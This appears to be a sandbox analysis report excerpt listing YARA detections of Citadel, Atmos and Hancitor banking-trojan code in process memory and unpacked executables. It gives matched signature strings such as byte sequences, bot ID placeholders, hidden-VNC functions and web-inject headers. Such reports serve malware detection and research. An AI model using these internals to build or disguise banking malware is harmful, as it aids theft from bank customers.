00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 3D 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 3D 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 3D 00
00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
Process Memory Space: services.png.exe PID: 6516	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: services.png.exe PID: 6516	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: services.png.exe PID: 6516	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x22fa8:$c: %BOTID% 0x2317e:$c: %BOTID% 0x343f3:$c: %BOTID% 0x345c9:$c: %BOTID% 0x40d9a:$c: %BOTID% 0x40f70:$c: %BOTID% 0x22fb0:$d: %BOTNET% 0x23185:$d: %BOTNET% 0x343fb:$d: %BOTNET% 0x345d0:$d: %BOTNET% 0x40da2:$d: %BOTNET% 0x40f77:$d: %BOTNET% 0x231f6:$f: bc_remove 0x232c2:$f: bc_remove 0x34641:$f: bc_remove 0x3470d:$f: bc_remove 0x40fe8:$f: bc_remove 0x410b4:$f: bc_remove 0x23200:$g: bc_add 0x232cb:$g: bc_add 0x3464b:$g: bc_add
Process Memory Space: nyheukpo.exe PID: 1460	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: nyheukpo.exe PID: 1460	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: nyheukpo.exe PID: 1460	JoeSecurity_Hancitor	Yara detected Hancitor	Joe Security
Process Memory Space: nyheukpo.exe PID: 1460	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x11c3e:$c: %BOTID% 0x11e14:$c: %BOTID% 0x1817b:$c: %BOTID% 0x18351:$c: %BOTID% 0x4108c:$c: %BOTID% 0x41262:$c: %BOTID% 0x49541:$c: %BOTID% 0x49717:$c: %BOTID% 0x78767:$c: %BOTID% 0x7893d:$c: %BOTID% 0xe891c:$c: %BOTID% 0xe8af2:$c: %BOTID% 0x10ccc9:$c: %BOTID% 0x10ce9f:$c: %BOTID% 0x11c46:$d: %BOTNET% 0x11e1b:$d: %BOTNET% 0x18183:$d: %BOTNET% 0x18358:$d: %BOTNET% 0x41094:$d: %BOTNET% 0x41269:$d: %BOTNET% 0x49549:$d: %BOTNET%
Process Memory Space: sihost.exe PID: 3420	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: sihost.exe PID: 3420	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: sihost.exe PID: 3420	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x2622d:$c: %BOTID% 0x26403:$c: %BOTID% 0x794a2:$c: %BOTID% 0x79678:$c: %BOTID% 0x26235:$d: %BOTNET% 0x2640a:$d: %BOTNET% 0x794aa:$d: %BOTNET% 0x7967f:$d: %BOTNET% 0x2647b:$f: bc_remove 0x26547:$f: bc_remove 0x796f0:$f: bc_remove 0x797bc:$f: bc_remove 0x26485:$g: bc_add 0x26550:$g: bc_add 0x796fa:$g: bc_add 0x797c5:$g: bc_add 0x251f4:$ggurl: http://www.google.com/webhp 0x25666:$ggurl: http://www.google.com/webhp 0x78469:$ggurl: http://www.google.com/webhp 0x788db:$ggurl: http://www.google.com/webhp
Process Memory Space: svchost.exe PID: 3456	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: svchost.exe PID: 3456	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: svchost.exe PID: 3456	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x4b0b:$c: %BOTID% 0x4ce1:$c: %BOTID% 0x42b9c:$c: %BOTID% 0x42d72:$c: %BOTID% 0x4b13:$d: %BOTNET% 0x4ce8:$d: %BOTNET% 0x42ba4:$d: %BOTNET% 0x42d79:$d: %BOTNET% 0x4d59:$f: bc_remove 0x4e25:$f: bc_remove 0x42dea:$f: bc_remove 0x42eb6:$f: bc_remove 0x4d63:$g: bc_add 0x4e2e:$g: bc_add 0x42df4:$g: bc_add 0x42ebf:$g: bc_add 0x3ad2:$ggurl: http://www.google.com/webhp 0x3f44:$ggurl: http://www.google.com/webhp 0x41b63:$ggurl: http://www.google.com/webhp 0x41fd5:$ggurl: http://www.google.com/webhp
Process Memory Space: svchost.exe PID: 3528	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: svchost.exe PID: 3528	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: svchost.exe PID: 3528	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x76839:$c: %BOTID% 0x76a0f:$c: %BOTID% 0xa9e49:$c: %BOTID% 0xaa01f:$c: %BOTID% 0x76841:$d: %BOTNET% 0x76a16:$d: %BOTNET% 0xa9e51:$d: %BOTNET% 0xaa026:$d: %BOTNET% 0x76a87:$f: bc_remove 0x76b53:$f: bc_remove 0xaa097:$f: bc_remove 0xaa163:$f: bc_remove 0x76a91:$g: bc_add 0x76b5c:$g: bc_add 0xaa0a1:$g: bc_add 0xaa16c:$g: bc_add 0x75800:$ggurl: http://www.google.com/webhp 0x75c72:$ggurl: http://www.google.com/webhp 0xa8e10:$ggurl: http://www.google.com/webhp 0xa9282:$ggurl: http://www.google.com/webhp
Process Memory Space: ctfmon.exe PID: 3832	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: ctfmon.exe PID: 3832	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: ctfmon.exe PID: 3832	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0xb15c:$c: %BOTID% 0xb332:$c: %BOTID% 0x194b5:$c: %BOTID% 0x1968b:$c: %BOTID% 0xb164:$d: %BOTNET% 0xb339:$d: %BOTNET% 0x194bd:$d: %BOTNET% 0x19692:$d: %BOTNET% 0xb3aa:$f: bc_remove 0xb476:$f: bc_remove 0x19703:$f: bc_remove 0x197cf:$f: bc_remove 0xb3b4:$g: bc_add 0xb47f:$g: bc_add 0x1970d:$g: bc_add 0x197d8:$g: bc_add 0xa123:$ggurl: http://www.google.com/webhp 0xa595:$ggurl: http://www.google.com/webhp 0x1847c:$ggurl: http://www.google.com/webhp 0x188ee:$ggurl: http://www.google.com/webhp
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: explorer.exe PID: 2580	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x5c378:$c: %BOTID% 0x5c54e:$c: %BOTID% 0x1f58a7:$c: %BOTID% 0x1f5a7d:$c: %BOTID% 0x5c380:$d: %BOTNET% 0x5c555:$d: %BOTNET% 0x1f58af:$d: %BOTNET% 0x1f5a84:$d: %BOTNET% 0x5c5c6:$f: bc_remove 0x5c692:$f: bc_remove 0x1f5af5:$f: bc_remove 0x1f5bc1:$f: bc_remove 0x5c5d0:$g: bc_add 0x5c69b:$g: bc_add 0x1f5aff:$g: bc_add 0x1f5bca:$g: bc_add 0x5b33f:$ggurl: http://www.google.com/webhp 0x5b7b1:$ggurl: http://www.google.com/webhp 0x1f486e:$ggurl: http://www.google.com/webhp 0x1f4ce0:$ggurl: http://www.google.com/webhp
Process Memory Space: svchost.exe PID: 4196	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: svchost.exe PID: 4196	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: svchost.exe PID: 4196	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x5caa:$c: %BOTID% 0x5e80:$c: %BOTID% 0x177ed:$c: %BOTID% 0x179c3:$c: %BOTID% 0x5cb2:$d: %BOTNET% 0x5e87:$d: %BOTNET% 0x177f5:$d: %BOTNET% 0x179ca:$d: %BOTNET% 0x5ef8:$f: bc_remove 0x5fc4:$f: bc_remove 0x17a3b:$f: bc_remove 0x17b07:$f: bc_remove 0x5f02:$g: bc_add 0x5fcd:$g: bc_add 0x17a45:$g: bc_add 0x17b10:$g: bc_add 0x4c71:$ggurl: http://www.google.com/webhp 0x50e3:$ggurl: http://www.google.com/webhp 0x167b4:$ggurl: http://www.google.com/webhp 0x16c26:$ggurl: http://www.google.com/webhp
Process Memory Space: StartMenuExperienceHost.exe PID: 4660	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: StartMenuExperienceHost.exe PID: 4660	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: StartMenuExperienceHost.exe PID: 4660	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x43ec:$c: %BOTID% 0x45c2:$c: %BOTID% 0x8571e:$c: %BOTID% 0x858f4:$c: %BOTID% 0x43f4:$d: %BOTNET% 0x45c9:$d: %BOTNET% 0x85726:$d: %BOTNET% 0x858fb:$d: %BOTNET% 0x463a:$f: bc_remove 0x4706:$f: bc_remove 0x8596c:$f: bc_remove 0x85a38:$f: bc_remove 0x4644:$g: bc_add 0x470f:$g: bc_add 0x85976:$g: bc_add 0x85a41:$g: bc_add 0x33b3:$ggurl: http://www.google.com/webhp 0x3825:$ggurl: http://www.google.com/webhp 0x846e5:$ggurl: http://www.google.com/webhp 0x84b57:$ggurl: http://www.google.com/webhp
Process Memory Space: RuntimeBroker.exe PID: 4872	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4872	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4872	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x2baa5:$c: %BOTID% 0x2bc7b:$c: %BOTID% 0x5572d:$c: %BOTID% 0x55903:$c: %BOTID% 0x2baad:$d: %BOTNET% 0x2bc82:$d: %BOTNET% 0x55735:$d: %BOTNET% 0x5590a:$d: %BOTNET% 0x2bcf3:$f: bc_remove 0x2bdbf:$f: bc_remove 0x5597b:$f: bc_remove 0x55a47:$f: bc_remove 0x2bcfd:$g: bc_add 0x2bdc8:$g: bc_add 0x55985:$g: bc_add 0x55a50:$g: bc_add 0x2aa6c:$ggurl: http://www.google.com/webhp 0x2aede:$ggurl: http://www.google.com/webhp 0x546f4:$ggurl: http://www.google.com/webhp 0x54b66:$ggurl: http://www.google.com/webhp
Process Memory Space: XRdxSzSUL8yOL.exe PID: 5012	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
Process Memory Space: XRdxSzSUL8yOL.exe PID: 5012	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
Process Memory Space: XRdxSzSUL8yOL.exe PID: 5012	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x2a87:$c: %BOTID% 0x2c5d:$c: %BOTID% 0x2a8f:$d: %BOTNET% 0x2c64:$d: %BOTNET% 0x2cd5:$f: bc_remove 0x2da1:$f: bc_remove 0x2cdf:$g: bc_add 0x2daa:$g: bc_add 0x1a4e:$ggurl: http://www.google.com/webhp 0x1ec0:$ggurl: http://www.google.com/webhp
Click to see the 414 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
22.3.SystemSettings.exe.f10000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
22.3.SystemSettings.exe.f10000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
22.3.SystemSettings.exe.f10000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
22.3.SystemSettings.exe.f10000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 F1 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 F1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 F1 00
22.3.SystemSettings.exe.f10000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
15.3.smartscreen.exe.290000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
15.3.smartscreen.exe.290000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
15.3.smartscreen.exe.290000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
15.3.smartscreen.exe.290000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 29 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 29 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 29 00
15.3.smartscreen.exe.290000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
19.3.ApplicationFrameHost.exe.180000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
19.3.ApplicationFrameHost.exe.180000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
19.3.ApplicationFrameHost.exe.180000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
19.3.ApplicationFrameHost.exe.180000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 18 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 18 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 18 00
19.3.ApplicationFrameHost.exe.180000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
18.0.RuntimeBroker.exe.900000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
18.0.RuntimeBroker.exe.900000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
18.0.RuntimeBroker.exe.900000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
